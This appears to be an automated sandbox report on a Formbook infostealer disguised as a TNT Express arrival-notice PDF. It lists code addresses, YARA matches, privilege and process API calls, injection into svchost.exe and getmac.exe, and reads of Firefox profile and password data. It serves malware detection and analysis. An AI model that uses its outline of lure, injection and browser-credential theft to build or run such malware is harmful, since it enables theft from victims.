Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282F28	2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260F30	2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E2F30	2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4F40	2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEFA0	2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CFE0	2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232FC8	2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEE26	2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240E59	2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252E90	2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCE93	2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEEDB	2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AD00	2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DCD1F	2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258DBF	2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323ADE0	2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240C00	2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0CB5	2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230CF2	2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F132D	2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D34C	2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328739A	2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032452A0	2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E12ED	2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B2C0	2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327516C	2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F172	2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B16B	2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B1B0	2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70E9	2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF0E0	2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF0CC	2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032470C0	2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF7B0	2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F16CC	2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7571	2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD5B0	2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF43F	2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231460	2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB76	2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FB80	2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5BF0	2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DBF9	2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B3A6C	2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA49	2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7A46	2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DDAAC	2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285AA0	2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E1AA3	2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EDAC6	2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D5910	2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249950	2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B950	2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD800	2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032438E0	2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF09	2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFFB1	2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241F92	2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249EB0	2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D73	2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243D40	2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1D5A	2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FDC0	2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9C32	2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFCF2	2_2_032FFCF2
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03580B1B	3_2_03580B1B
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0355638C	3_2_0355638C
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03560251	3_2_03560251
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356010B	3_2_0356010B
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356208B	3_2_0356208B
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03568776	3_2_03568776
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_0356877B	3_2_0356877B
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03561E62	3_2_03561E62
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Code function: 3_2_03561E6B	3_2_03561E6B
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05010535	4_2_05010535
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C7571	4_2_050C7571
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050D0591	4_2_050D0591
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050AD5B0	4_2_050AD5B0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CF43F	4_2_050CF43F
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C2446	4_2_050C2446
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05001460	4_2_05001460
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050BE4F6	4_2_050BE4F6
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05034750	4_2_05034750
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05010770	4_2_05010770
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CF7B0	4_2_050CF7B0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0500C7C0	4_2_0500C7C0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C16CC	4_2_050C16CC
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0502C6E0	4_2_0502C6E0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05000100	4_2_05000100
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050AA118	4_2_050AA118
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05098158	4_2_05098158
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050DB16B	4_2_050DB16B
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0504516C	4_2_0504516C
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050D01AA	4_2_050D01AA
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0501B1B0	4_2_0501B1B0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C81CC	4_2_050C81CC
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04FFF172	4_2_04FFF172
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050170C0	4_2_050170C0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050BF0CC	4_2_050BF0CC
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C70E9	4_2_050C70E9
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CF0E0	4_2_050CF0E0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C132D	4_2_050C132D
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CA352	4_2_050CA352
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0505739A	4_2_0505739A
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050D03E6	4_2_050D03E6
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0501E3F0	4_2_0501E3F0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050B0274	4_2_050B0274
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050152A0	4_2_050152A0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04FFD34C	4_2_04FFD34C
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0502B2C0	4_2_0502B2C0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050902C0	4_2_050902C0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050B12ED	4_2_050B12ED
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0501AD00	4_2_0501AD00
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05013D40	4_2_05013D40
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C1D5A	4_2_050C1D5A
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C7D73	4_2_050C7D73
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05028DBF	4_2_05028DBF
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0502FDC0	4_2_0502FDC0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0500ADE0	4_2_0500ADE0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05010C00	4_2_05010C00
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05089C32	4_2_05089C32
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050B0CB5	4_2_050B0CB5
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05000CF2	4_2_05000CF2
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CFCF2	4_2_050CFCF2
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CFF09	4_2_050CFF09
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05052F28	4_2_05052F28
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05030F30	4_2_05030F30
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05084F40	4_2_05084F40
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05011F92	4_2_05011F92
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0508EFA0	4_2_0508EFA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CFFB1	4_2_050CFFB1
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05002FC8	4_2_05002FC8
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0501CFE0	4_2_0501CFE0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CEE26	4_2_050CEE26
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05010E59	4_2_05010E59
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05022E90	4_2_05022E90
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CCE93	4_2_050CCE93
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05019EB0	4_2_05019EB0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CEEDB	4_2_050CEEDB
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04FF68B8	4_2_04FF68B8
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05019950	4_2_05019950
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0502B950	4_2_0502B950
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05026962	4_2_05026962
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050129A0	4_2_050129A0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050DA9A6	4_2_050DA9A6
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0507D800	4_2_0507D800
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05012840	4_2_05012840
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0501A840	4_2_0501A840
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050138E0	4_2_050138E0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0503E8F0	4_2_0503E8F0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CAB40	4_2_050CAB40
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CFB76	4_2_050CFB76
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0502FB80	4_2_0502FB80
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C6BD7	4_2_050C6BD7
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05085BF0	4_2_05085BF0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0504DBF9	4_2_0504DBF9
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050CFA49	4_2_050CFA49
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050C7A46	4_2_050C7A46
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05083A6C	4_2_05083A6C
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_0500EA80	4_2_0500EA80
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05055AA0	4_2_05055AA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050ADAAC	4_2_050ADAAC
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050BDAC6	4_2_050BDAC6
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030C1C90	4_2_030C1C90
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030C5330	4_2_030C5330
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030B1121	4_2_030B1121
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030C350B	4_2_030C350B
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030C3510	4_2_030C3510
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030BCBF7	4_2_030BCBF7
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030DB8B0	4_2_030DB8B0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030BAFE6	4_2_030BAFE6
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030BCE20	4_2_030BCE20
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030BAEA0	4_2_030BAEA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030BCC00	4_2_030BCC00
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04E7E4D6	4_2_04E7E4D6
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04E85641	4_2_04E85641
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04E7E3B8	4_2_04E7E3B8
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04E7D8D8	4_2_04E7D8D8
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_04E7E86C	4_2_04E7E86C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 105 times
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: String function: 008E0A30 appears 46 times
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: String function: 008C9CB3 appears 31 times
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: String function: 008DF9F2 appears 40 times
Source: C:\Windows\SysWOW64\getmac.exe	Code function: String function: 05057E54 appears 97 times
Source: C:\Windows\SysWOW64\getmac.exe	Code function: String function: 0508F290 appears 105 times
Source: C:\Windows\SysWOW64\getmac.exe	Code function: String function: 0507EA12 appears 86 times
Source: C:\Windows\SysWOW64\getmac.exe	Code function: String function: 04FFB970 appears 269 times
Source: C:\Windows\SysWOW64\getmac.exe	Code function: String function: 05045130 appears 36 times

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1363492037.00000000038F3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1363718345.0000000003A9D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@18/15

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_009337B5 GetLastError,FormatMessageW,

0_2_009337B5

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_009210BF AdjustTokenPrivileges,CloseHandle,		0_2_009210BF
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_009216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009216C3

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_009351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009351CD

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0094A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0094A67C

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0093648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0093648E

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_008C42A2

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

File created: C:\Users\user~1\AppData\Local\Temp\autC1A7.tmp

Jump to behavior

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: getmac.exe, 00000004.00000003.1750727587.0000000003314000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3820332065.0000000003335000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1750804113.0000000003301000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3820332065.0000000003301000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	ReversingLabs: Detection: 70%
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe"
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe"
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Process created: C:\Windows\SysWOW64\getmac.exe "C:\Windows\SysWOW64\getmac.exe"
